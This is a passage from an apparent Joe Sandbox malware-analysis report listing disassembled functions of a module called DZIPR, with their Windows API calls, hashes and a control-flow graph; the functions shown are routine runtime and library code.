                                          • __EH_prolog3.LIBCMT ref: 6C51C057
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: H_prolog3$Exception@8Throw
                                          • String ID:
                                          • API String ID: 2489616738-0
                                          • Opcode ID: 5a5b970ab08a0be171ea2d8ec033d159e8a3c6470d4404ef61fb843d685c9c21
                                          • Instruction ID: 27c1d0ac4230614d972670be3644dda59667b227222894c048c45ce24e8540ac
                                          • Opcode Fuzzy Hash: 5a5b970ab08a0be171ea2d8ec033d159e8a3c6470d4404ef61fb843d685c9c21
                                          • Instruction Fuzzy Hash: 20015A70709212CBEB18BE728C193AD76B2AB81359F11853CD4528BFA0DF32DD45CB50
                                          Function 6C5160F0 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 259 6c5160f0-6c516139 CreateFileW 260 6c51613f-6c5167e4 259->260 261 6c5161de-6c516780 259->261 268 6c515e23-6c515e3c 260->268 269 6c515eba-6c515f0c GlobalAlloc 260->269 272 6c515e40-6c515e4e 268->272 270 6c515f12-6c515f2b 269->270 271 6c515fad 269->271 274 6c515f2f-6c515f3d 270->274 273 6c515faf-6c515fce 271->273 276 6c515e50 272->276 277 6c515ea3 272->277 291 6c515fd0 273->291 292 6c515fe7-6c515fea 273->292 279 6c515f92 274->279 280 6c515f3f 274->280 278 6c515e52-6c515e58 276->278 281 6c515ea5-6c515ea9 277->281 278->278 282 6c515e5a-6c515e5c 278->282 285 6c515f94-6c515f98 279->285 284 6c515f41-6c515f47 280->284 286 6c5167c3-6c5167d8 281->286 287 6c515eaf-6c515eb4 281->287 282->277 290 6c515e5e-6c515e64 282->290 284->284 293 6c515f49-6c515f4b 284->293 288 6c5167a5-6c5167be 285->288 289 6c515f9e-6c515fa3 285->289 287->272 295 6c515eb6 287->295 288->273 289->274 296 6c515fa5-6c515fa9 289->296 297 6c5166aa-6c5166af 290->297 298 6c515e6a-6c515e6e 290->298 299 6c515fd2-6c515fe5 291->299 300 6c515fec 292->300 301 6c515ffe-6c516038 292->301 293->279 302 6c515f4d-6c515f53 293->302 295->269 296->271 297->281 309 6c515e97-6c515ea1 297->309 298->269 299->292 299->299 304 6c515fee-6c515ffc 300->304 307 6c5160d9 301->307 308 6c51603e-6c516057 301->308 305 6c5166b4 302->305 306 6c515f59-6c515f5d 302->306 304->301 304->304 313 6c5166be 305->313 311 6c515f5f-6c515f75 306->311 310 6c5160db-6c5160ef 307->310 312 6c51605b-6c516069 308->312 309->281 310->259 311->311 314 6c515f77-6c515f84 311->314 315 6c51606b 312->315 316 6c5160be 312->316 321 6c516788-6c5167a0 313->321 314->285 318 6c515f86-6c515f90 314->318 319 6c51606d-6c516073 315->319 317 6c5160c0-6c5160c4 316->317 317->321 322 6c5160ca-6c5160cf 317->322 318->285 319->319 320 6c516075-6c516077 319->320 320->316 323 6c516079-6c51607f 320->323 321->310 322->312 324 6c5160d1-6c5160d5 322->324 323->313 325 6c516085-6c516089 323->325 324->307 326 6c51608b-6c5160a1 325->326 326->326 327 6c5160a3-6c5160b0 326->327 327->317 328 6c5160b2-6c5160bc 327->328 328->317
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6C5160F6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e41cf0a8099545f01e29b96a94d6ae051ca3b600784915296890baf23fbbaa1d
                                          • Instruction ID: f4e72700e4622929da1f23835defaabf8f1a22db8a8e3f20e37a6f6e8653a7d7
                                          • Opcode Fuzzy Hash: e41cf0a8099545f01e29b96a94d6ae051ca3b600784915296890baf23fbbaa1d
                                          • Instruction Fuzzy Hash: 4F01E8B4A087019FC718DF0AC89090ABBF6FFC8308F16852DA84897316C630E851CF89
                                          Function 6C52A6F4 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 329 6c52a6f4-6c52a716 HeapCreate 330 6c52a71a-6c52a723 329->330 331 6c52a718-6c52a719 329->331
                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6C524776,00000001,?,?,?,6C5248EF,?,?,?,6C53E848,0000000C,6C5249AA), ref: 6C52A709
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          • Opcode ID: 04dc7ebb1a01d995da2076b772324e92507488c78fe2b36077ccc0c593f48663
                                          • Instruction ID: 86b28a3b87f8e373c7020ecf6a80ca6d0ecadef41e706e607c30112d9e21a0fc
                                          • Opcode Fuzzy Hash: 04dc7ebb1a01d995da2076b772324e92507488c78fe2b36077ccc0c593f48663
                                          • Instruction Fuzzy Hash: 5BD05E326543449ADB10AEB15C48B263BFC938579AF198836F80DCA180F574C5909A48

                                          Non-executed Functions

                                          Function 6C51748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6C517498
                                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6C5176D5,?,00000000,?,00000000,00000104,00000000,?,6C53BEF4,00000000), ref: 6C5174D6
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6C517546
                                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C51756D
                                          • CharUpperW.USER32(00000000), ref: 6C5175A0
                                          • FindFirstFileW.KERNEL32(?,?), ref: 6C5175BC
                                          • FindClose.KERNEL32(00000000), ref: 6C5175C8
                                          • lstrlenW.KERNEL32(?), ref: 6C5175E6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                          • String ID:
                                          • API String ID: 624941980-0
                                          • Opcode ID: 8e5a2c17a4308308c9243fe3d013a72c3c3f313923e41d8dd8cf738ee3a7d9d1
                                          • Instruction ID: 5d4ac99be29dfa60d2e3e7620d0c3929713042868e21ab920bca9264e25b9e9c
                                          • Opcode Fuzzy Hash: 8e5a2c17a4308308c9243fe3d013a72c3c3f313923e41d8dd8cf738ee3a7d9d1
                                          • Instruction Fuzzy Hash: 1D41A47090D2159BEF249F69CC8CBAE7B78AF41358F1006D9E81991E91DB758E88CF21
                                          Function 6C523F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 6C527C6C
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C527C81
                                          • UnhandledExceptionFilter.KERNEL32(6C53A4B8), ref: 6C527C8C
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6C527CA8
                                          • TerminateProcess.KERNEL32(00000000), ref: 6C527CAF
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: d58b94cb6722b9148172c2d7956d3116a74497941e88f95e104a0ac282d9fec0
                                          • Instruction ID: 572f31b802f603751e02f7023b8562608e96bc7411e5b605d6fe67f00d7f3e57
                                          • Opcode Fuzzy Hash: d58b94cb6722b9148172c2d7956d3116a74497941e88f95e104a0ac282d9fec0
                                          • Instruction Fuzzy Hash: 6D21FFB470A204DFDB41EF25CC486493BB4BB4A308F92901BE5089B390E7B499848F49
                                          Function 6C5189B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6C5189FC
                                          • __snwprintf_s.LIBCMT ref: 6C518A2E
                                          • LoadLibraryW.KERNEL32(?), ref: 6C518A69
                                            • Part of subcall function 6C525348: __getptd_noexit.LIBCMT ref: 6C525348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                          • String ID: LOC
                                          • API String ID: 3175857669-519433814
                                          • Opcode ID: 71f98693fd40b945e6c3fdcda655c09a3438139325c37d5467ad5f8b494df325
                                          • Instruction ID: b5f631ad7d46397184f89cead4035ba868ae97fa48a09172bdbea4e6f519a5fe
                                          • Opcode Fuzzy Hash: 71f98693fd40b945e6c3fdcda655c09a3438139325c37d5467ad5f8b494df325
                                          • Instruction Fuzzy Hash: 8D11DA71A44308EBEB21AB64CC48BDE77FDEB41368F510466E114A7EC0DB789E08D762
                                          Function 6C518BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6C518BE9
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C518EB7,?,?), ref: 6C518C19
                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C518C2D
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518C69
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518C77
                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C518C94
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518CBF
                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C518CC8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6C518CE1
                                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6C518CFE
                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C518D31
                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6C518D3A
                                          • GetModuleFileNameW.KERNEL32(6C510000,?,00000105), ref: 6C518D7F
                                          • _memset.LIBCMT ref: 6C518D9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                          • API String ID: 3537336938-2299501126
                                          • Opcode ID: 401e5141d628cb83c49fa6522948335d043b5762d5e1b09002cca925a9f34bbc
                                          • Instruction ID: 32e9f2901792fd58d7ab9227133c4347787cf6010a7dbb0fc125270944f698b8
                                          • Opcode Fuzzy Hash: 401e5141d628cb83c49fa6522948335d043b5762d5e1b09002cca925a9f34bbc
                                          • Instruction Fuzzy Hash: 15514C70D152289ADB74DFA59C8C7ADB6F4EB98304F1102DBA448E7680E7788E81CF55
                                          Function 6C51DCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6C51DE36,?,?,?,?,?,?,?,6C51FCC6,00000000,00000002,00000028), ref: 6C51DCF9
                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6C51DD15
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C51DD2A
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6C51DD3B
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6C51DD4C
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6C51DD5D
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6C51DD6E
                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6C51DD8E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                          • API String ID: 667068680-2451437823
                                          • Opcode ID: fd6e124a98e3f96ed73a22532c2e17e8cccc005f070728d9becbc317371e6c0b
                                          • Instruction ID: 3e928ebe8f054c81ae4df27087a2c56849291b83affec152baa39a8c5971b81e
                                          • Opcode Fuzzy Hash: fd6e124a98e3f96ed73a22532c2e17e8cccc005f070728d9becbc317371e6c0b
                                          • Instruction Fuzzy Hash: 672130B1AA91A1BFAB03BF649CC842E7AF4B68B30D366D93FD105E2F04E77400418A15
                                          Function 6C51FBD6 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 175windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 6C51FC05
                                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C51FC28
                                          • GetWindowRect.USER32(?,?), ref: 6C51FC42
                                          • CopyRect.USER32(?,?), ref: 6C51FCA5
                                          • CopyRect.USER32(?,?), ref: 6C51FCAF
                                          • GetWindowRect.USER32(00000000,?), ref: 6C51FCB8
                                            • Part of subcall function 6C51DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C51DED6
                                          • CopyRect.USER32(?,?), ref: 6C51FCD4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Rect$Copy$Window$ByteCharMessageMultiParentSendWide
                                          • String ID: (
                                          • API String ID: 2332539329-3887548279
                                          • Opcode ID: edee0c5d007565f756ca003417e94f637255ae9c344b854d80a0bd63bb6d5aa4
                                          • Instruction ID: 0479c73743537714cb674d95c5eb13605d66550d62f8fd234d0fd4b5f3d59af1
                                          • Opcode Fuzzy Hash: edee0c5d007565f756ca003417e94f637255ae9c344b854d80a0bd63bb6d5aa4
                                          • Instruction Fuzzy Hash: 3D517372A08519ABDB05CBA8CD88EEEB7B9AF48354F150216F915F7B40D730E905CB54
                                          Function 6C52A11F Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C53E928,0000000C,6C52A25A,00000000,00000000,?,6C52A5D4,00000000,00000001,00000000,?,6C52A89E,00000018,6C53E978,0000000C), ref: 6C52A131
                                          • __crt_waiting_on_module_handle.LIBCMT ref: 6C52A13C
                                            • Part of subcall function 6C525BCF: Sleep.KERNEL32(000003E8,00000000,?,6C52A082,KERNEL32.DLL,?,?,6C52A416,00000000,?,6C52488C,00000000,?,?,?,6C5248EF), ref: 6C525BDB
                                            • Part of subcall function 6C525BCF: GetModuleHandleW.KERNEL32(00000000,?,6C52A082,KERNEL32.DLL,?,?,6C52A416,00000000,?,6C52488C,00000000,?,?,?,6C5248EF,?), ref: 6C525BE4
                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C52A165
                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6C52A175
                                          • __lock.LIBCMT ref: 6C52A197
                                          • InterlockedIncrement.KERNEL32(?), ref: 6C52A1A4
                                          • __lock.LIBCMT ref: 6C52A1B8
                                          • ___addlocaleref.LIBCMT ref: 6C52A1D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                          • String ID: $Tl$DecodePointer$EncodePointer$KERNEL32.DLL
                                          • API String ID: 1028249917-2572227779
                                          • Opcode ID: 7dac294ec9812ac93ab729af213d181f1a7ef80bbf76fb71917381485e2aa19d
                                          • Instruction ID: befab7f160a0ec6b4d60ac8a3a26f8b10afe946286455b5b88e7e67b4b679098
                                          • Opcode Fuzzy Hash: 7dac294ec9812ac93ab729af213d181f1a7ef80bbf76fb71917381485e2aa19d
                                          • Instruction Fuzzy Hash: 3611A271800B15DEDB209F79CC04B9ABBF0AF85328F10951AD499D3BD0DB789A44DF65
                                          Function 6C5184DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6C518503
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C518520
                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6C51852D
                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6C51853A
                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6C518547
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 667068680-2424895508
                                          • Opcode ID: 53bd0083ea970fcb39c6e0408c802168585068cd046323b48b3a12f6d9129563
                                          • Instruction ID: 7c294afb9bbbc1d5b79d62d9774223d8026569ca7df3ea8aec6bf71ff0662f64
                                          • Opcode Fuzzy Hash: 53bd0083ea970fcb39c6e0408c802168585068cd046323b48b3a12f6d9129563
                                          • Instruction Fuzzy Hash: 8E1133B1B0D251BF9B24BF568C8C406BFB4DA4631CB57853FE109C3E21E6304540CA17
                                          Function 6C51A59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32,6C51A6B6), ref: 6C51A5AA
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C51A5CB
                                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C51A5DD
                                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C51A5EF
                                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C51A601
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 417325364-2424895508
                                          • Opcode ID: c9057e9b7473bdc49777cd4a48a8409db82c54749e036ed457621c0ee0129b64
                                          • Instruction ID: 8567e72ec4733d9a44e2d70fe04136c02bccb0a86743e06b2129732d007f284c
                                          • Opcode Fuzzy Hash: c9057e9b7473bdc49777cd4a48a8409db82c54749e036ed457621c0ee0129b64
                                          • Instruction Fuzzy Hash: 44F0D471A0D235ABDF45BFB28C0CA057FB8A70631CB02991BA808D3A20E67080088F4A
                                          Function 6C511C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6C511BE9,?,?,?,?), ref: 6C511C39
                                          • GetLastError.KERNEL32(?,?,?,?,?,6C511BE9,?,?,?,?), ref: 6C511C48
                                          • __aullrem.LIBCMT ref: 6C511C60
                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6C511CE8
                                          • _memset.LIBCMT ref: 6C511CF5
                                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6C511BE9,?,?,?,?), ref: 6C511D07
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                          • String ID:
                                          • API String ID: 123228641-0
                                          • Opcode ID: 42c794d777de794a46f8e88f897f3cd0560cf02d0e8c276a77ae8ae45f413898
                                          • Instruction ID: 37bd14baa932335d064a9354862eadc9efda90bbcdd2f9db2fa17216b42feea2
                                          • Opcode Fuzzy Hash: 42c794d777de794a46f8e88f897f3cd0560cf02d0e8c276a77ae8ae45f413898
                                          • Instruction Fuzzy Hash: D0518F71608701AFE750DF29CC44B9BB7E8FF98758F044A2AF958E7641E770D9048BA2
                                          Function 6C51BE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6C51BE14
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 6C51BE25
                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?,?,?,?), ref: 6C51BE43
